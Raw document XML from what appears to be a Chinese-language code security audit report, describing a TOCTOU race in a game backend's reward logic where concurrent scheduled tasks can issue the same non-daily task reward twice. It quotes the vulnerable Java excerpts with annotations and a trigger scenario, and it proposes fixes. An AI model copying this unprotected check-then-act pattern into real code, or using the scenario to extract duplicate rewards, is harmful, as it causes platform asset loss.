              <w:t xml:space="preserve">    // ---- 非每日任务分支（缺乏幂等保护，漏洞点）----</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord userTaskRecord = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseGet(() -&gt; { ... return userTaskRecordRepository.save(r); });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    // 跳过已完成任务：READ_COMMITTED 下并发事务此时均读到 status &lt; 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if (userTaskRecord.getStatus() != null &amp;&amp; userTaskRecord.getStatus() &gt;= 2) { // ← 两个并发事务均通过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">        continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    int newProgress = (...getCurrentProgress()...) + delta;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecord.setCurrentProgress(newProgress);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (newProgress &gt;= targetProgress) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setStatus(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setCompleteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        applyReward(userId, task.getId());        // ← 奖励先发放，无唯一约束/版本号保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // 两个并发事务均执行到此处，applyReward 被调用两次！</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(userTaskRecord); // ← status=2 最后才落库，无法防止并发重入</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漏洞利用场景（代码缺陷型，无需 HTTP POC）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前提条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：应用以多实例集群方式部署（生产环境常见），或单实例下 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 单次执行时间超过 10 分钟。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1361"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：多个应用实例同时运行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，对同一用户均判断 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>traded=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，均调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，两个独立 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务并发执行非每日任务分支，均在对方提交前读取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status &lt; 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1362"/>
        </w:num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：该用户的非每日任务奖励被发放两次（或更多次，取决于并发实例数量），平台遭受资产损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 核对与对比：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1363"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每日任务分支已使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataIntegrityViolationException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 唯一约束作为幂等屏障（正确）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">非每日任务分支应对齐同等保护，例如：在调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前先 INSERT 一条带唯一约束的奖励发放记录，或对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加乐观锁版本号（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），或使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UPDATE ... WHERE status &lt; 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 CAS 原子更新替代先读后写。</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365"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.firstTradeTask → TaskExecutionService.java.updateProgress → TaskConfig.java.getGoalNum</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audit_m265_1256_firstTradeTask_ctrl-path26of29.md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：TaskExecutionService.java#updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_64" w:id="64"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞63：非每日任务奖励发放缺乏幂等保护导致 TOCTOU 竞态双重发奖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1366"/>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：非每日任务（S级/限定等）奖励发放 TOCTOU 竞态条件——双重发奖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1367"/>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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1368"/>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：并发设计缺陷 / TOCTOU（检查-使用竞态）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1369"/>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370"/>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：无需额外权限（由调度任务或其他合法触发路径并发调用即可触发）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1371"/>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updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>非每日任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType != 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）分支，采用"先 SELECT 当前进度→判断是否达标→发奖→UPDATE 状态"的非原子读写序列，且未对目标行加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，也未在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 层面设置防重放唯一约束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与此形成对比的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日任务分支（taskType=1）已做到正确的幂等保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">——先 INSERT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（数据库唯一约束），利用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DataIntegrityViolationException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 捕获并发重复插入，保证 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 只被调用一次。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">非每日任务分支完全依赖对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecord.getStatus() &gt;= 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的乐观状态检查；在多实例部署（集群）或同一触发条件被并发激活时，两个事务可以同时读到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（进行中），同时计算出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>newProgress &gt;= targetProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，双双进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward(userId, task.getId())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，各自提交 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，最终导致同一任务的奖励被发放两次。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1372"/>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@Scheduled(fixedRate=10*60*1000) userKycVerifiedTask          ← 多实例各自独立调度，无分布式锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └─ taskExecutionService.updateProgress(user.getId(), "3", 1)  ← @Transactional，但无行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">       └─ [非每日任务分支] applyReward(userId, task.getId())     ← 双重触发点</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            └─ rewardApplyService.apply(userId, rewardType, rewardValue, minerLevel)  ← 奖励实际发放</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1373"/>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：从上下文可见，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskRewardConfig.rewardValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应矿机（minerLevel）或 USDT 奖池相关的虚拟/实物价值资产；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被重复调用意味着对同一用户同一任务发放两倍甚至多倍奖励，直接造成平台资产异常流失。</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触发入口：UserScheduler.java — 无分布式锁，多实例同时调度时并发调用下游</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)</w:t>
              <w:br/>
              <w:t>public void userKycVerifiedTask() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    var users = userRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .findByIsNewUserAndIsKycVerifiedAndOpenIdIsNotNullAndInviterCodeIsNotNull(0, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (User user : users) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (c2PassFlag) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                user.setIsKycVerified(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                userRepository.save(user);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                // ← 多实例竞争：两个实例在 save 提交前均可读到同一 user，</w:t>
              <w:br/>
              <w:t xml:space="preserve">                //   导致下方 updateProgress 被并发调用</w:t>
              <w:br/>
              <w:t xml:space="preserve">                taskExecutionService.updateProgress(user.getId(), "3", 1); // ← 污点传入，并发触发</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) { }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：TaskExecutionService.java#updateProgress — 非每日任务分支，无行锁无幂等写保护</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void updateProgress(Long userId, String triggerCondition, int delta) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (TaskConfig task : tasks) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ========== 分支2：非每日任务（taskType≠1）==========</w:t>
              <w:br/>
              <w:t xml:space="preserve">        UserTaskRecord userTaskRecord = userTaskRecordRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndTaskId(userId, taskId)  // ← 普通 SELECT，无 FOR UPDATE</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseGet(() -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                UserTaskRecord r = new UserTaskRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">                r.setCurrentProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">                return userTaskRecordRepository.save(r);  // ← 并发时可能创建重复记录（无唯一约束保护）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            });</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        // ← 竞态检查点：两个并发事务均读到 status=1，均通过此检查</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        if (userTaskRecord.getStatus() != null &amp;&amp; userTaskRecord.getStatus() &gt;= 2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            continue; // 已完成则跳过——但并发场景下两个事务同时读到 status&lt;2，均不跳过</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
